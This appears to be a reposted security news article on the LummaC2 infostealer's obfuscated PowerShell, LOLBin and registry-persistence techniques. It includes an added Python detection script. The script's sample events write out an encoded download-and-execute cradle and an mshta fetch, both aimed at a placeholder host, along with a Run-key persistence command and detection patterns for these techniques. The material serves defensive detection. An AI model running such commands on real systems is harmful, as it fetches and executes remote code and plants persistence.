LummaC2 infostealer makes use of obfuscated scripts via PowerShell to target endpoints – Go Health Pro

A new sample of the LummaC2 infostealer was observed using a series of PowerShell commands that downloaded and executed a payload on a targeted endpoint.

In a recent blog post, researchers at Ontinue described LummaC2 as an information-stealing malware written in the C programming language that is designed to steal sensitive information.

The researchers said the malware was observed being used as malware-as-a-service (MaaS), and was seen on Russian-speaking forums starting in 2022. The malware infects the target host and aims to steal information from the endpoint and then exfiltrate it to the C2 server.

“The key takeaway from our analysis is a reinforcement of the importance of monitoring and mitigating obfuscated scripts, particularly those delivered via PowerShell,” said Rhys Downing, cyber defender at Ontinue. “While the use of obfuscated PowerShell commands is not new, it remains a highly effective technique for attackers. Security teams should prioritize enhancing their detection and response capabilities around such tactics, ensuring that even well-known methods are continuously scrutinized and blocked.”

Why security pros should pay attention to LummaC2’s resurgence

LummaC2’s resurgence highlights significant risks because of its sophisticated use of PowerShell and “living-off-the-land” binaries already available within an environment, making it harder to detect and mitigate, said Jason Soroko, senior fellow at Sectigo.

Unlike typical PowerShell-based malware, Soroko said LummaC2 combines obfuscation, trusted Windows binaries (Mshta.exe and Dllhost.exe), and persistence techniques via registry modifications to evade defenses and maintain long-term control.

“The critical takeaway is the malware’s advanced multi-stage infection process and ability to exploit legitimate system tools, which requires heightened vigilance and proactive defense strategies from security teams,” said Soroko. “While PowerShell commands are commonly exploited, LummaC2’s combination of tactics presents a unique and more challenging threat.”
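The three behaviours the article groups together (obfuscated or encoded PowerShell, trusted binaries such as Mshta.exe and Dllhost.exe launched from a script, and persistence through registry changes) each leave a distinct trace in process-creation telemetry. The following is an added example of defender-side triage logic, not code from the article, Ontinue, or any vendor quoted here; the event format, the field names and the sample events are constructed for illustration and are not LummaC2 telemetry.

```python
"""Triage helpers for the PowerShell / LOLBin / registry-persistence pattern.

Constructed sample events only (not real LummaC2 data); the ProcessEvent
shape is an assumption standing in for whatever your EDR or Sysmon feed emits.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    parent: str   # parent image name, e.g. "explorer.exe"
    image: str    # child image name
    cmdline: str  # full command line as logged


# PowerShell accepts abbreviated switch names, so -e, -ec, -enc and
# -EncodedCommand all introduce a Base64-encoded UTF-16LE script.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})"
)

# Command-line and decoded-script indicators commonly paired with obfuscation.
SUSPICIOUS_PS = [
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-nop(?:rofile)?\b"), "no profile"),
    (re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"), "download cradle"),
]

# Trusted Windows binaries named in the article. dllhost.exe is also spawned
# legitimately as a COM surrogate, so treat it as a lower-confidence signal.
LOLBINS = {"mshta.exe", "dllhost.exe"}

RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\(?:Run|RunOnce)\b")
REG_WRITE = re.compile(r"(?i)\breg(?:\.exe)?\s+add\b|set-itemproperty|new-itemproperty")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> List[str]:
    """Return the list of findings for one process-creation event."""
    findings: List[str] = []
    image, parent = event.image.lower(), event.parent.lower()

    if image == "powershell.exe":
        decoded = decode_encoded_command(event.cmdline)
        if decoded is not None:
            findings.append("encoded command")
        # Scan the visible command line and the decoded script together, so
        # that indicators hidden behind the encoding are still caught.
        text = event.cmdline + " " + (decoded or "")
        findings.extend(label for pattern, label in SUSPICIOUS_PS if pattern.search(text))

    if parent == "powershell.exe" and image in LOLBINS:
        findings.append(f"{image} spawned by PowerShell")

    if RUN_KEY.search(event.cmdline) and REG_WRITE.search(event.cmdline):
        findings.append("Run-key persistence")

    return findings


def triage(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, e in enumerate(events) if (f := analyze(e))]


# Constructed sample telemetry. The encoded payload is a harmless placeholder
# download cradle pointing at the reserved .invalid TLD.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe", f"powershell.exe -nop -w hidden -enc {_B64}"),
    ProcessEvent("powershell.exe", "mshta.exe", "mshta.exe http://example.invalid/a.hta"),
    ProcessEvent("powershell.exe", "reg.exe",
                 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
                 '/v Updater /t REG_SZ /d "C:\\Users\\Public\\u.exe"'),
    ProcessEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),  # benign control
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].image, findings)
```

Each finding on its own is weak evidence; what makes the article's pattern stand out is the chain, so in practice you would correlate these events by process tree and time window rather than alert on any single rule.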

Itzik Alvas, co-founder and CEO at Entro Security, added that the LummaC2 infostealer lets attackers compromise credentials of human and non-human identities (NHIs) on infected systems. Alvas said that while the initial scope of attack is often relatively benign and most industries have standardized IAM and governance controls in place to limit risks associated with compromised human credentials, NHIs are often created and used with excessive permissions.

“As a result, compromised NHIs allow attackers on an infected system to covertly attack the entire organization from within,” said Alvas.
